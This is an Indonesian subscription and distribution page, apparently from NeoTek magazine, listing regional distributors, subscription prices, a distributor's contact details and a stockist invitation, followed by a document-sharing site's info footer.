Bandung CV Angkasa Jl. Merdeka No. 6 Bandung 40111 Tel. 021-4204795, 4208955 Fax. 022-4239183 Semarang Lestat Jl. Kaligarang 2B Semarang 50237 Tel. 024-8411489 Fax. 024-8445211 Yogyakarta Sumarno Jl. Garuda, Desa Jaranan RT10/41 Kec. Bangun Tapan Bantul Surabaya Toko Buku URANUS Jl. Ngagel Jaya 89-91 Surabaya Tel. 031-5681388

Berlangganan Untuk menjamin bahwa anda tidak lagi ketinggalan edisi NeoTek, paling baik berlangganan. Untuk itu hubungi:
KRISHNAdiSTRIBUTOR Tel. (021) 5835 0080 HP. (0816) 1187 111 (Boedi) email: krishnadistributor@neotek.co.id Kontak: Boedi Krishnadi BCA No. rek. 342-239-1611 . Harga NeoTek+CD mulai edisi IV/04: Rp20.000,- ( P. Jawa) Rp22.000,- (Luar P. Jawa) Ongkos kirim gratis untuk DKI Jakarta, sedangkan untuk luar DKI Jakarta, Rp6500,- per eksemplar.

Keuntungannya anda dapat memesan majalah+CD, majalah saja, atau CD saja, tetapi anda akan dibebani ongkos kirim, selain harus mengirim uang terlebih dahulu ke rekening:

Ingin Menjadi Stockist? Yang berminat berinvestasi sedikit dalam distribusi NeoTek, silakan hubungi pemasaran@neotek.co.id

Iklan visionnet


				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:959
posted:12/28/2009
language:Indonesian
pages:50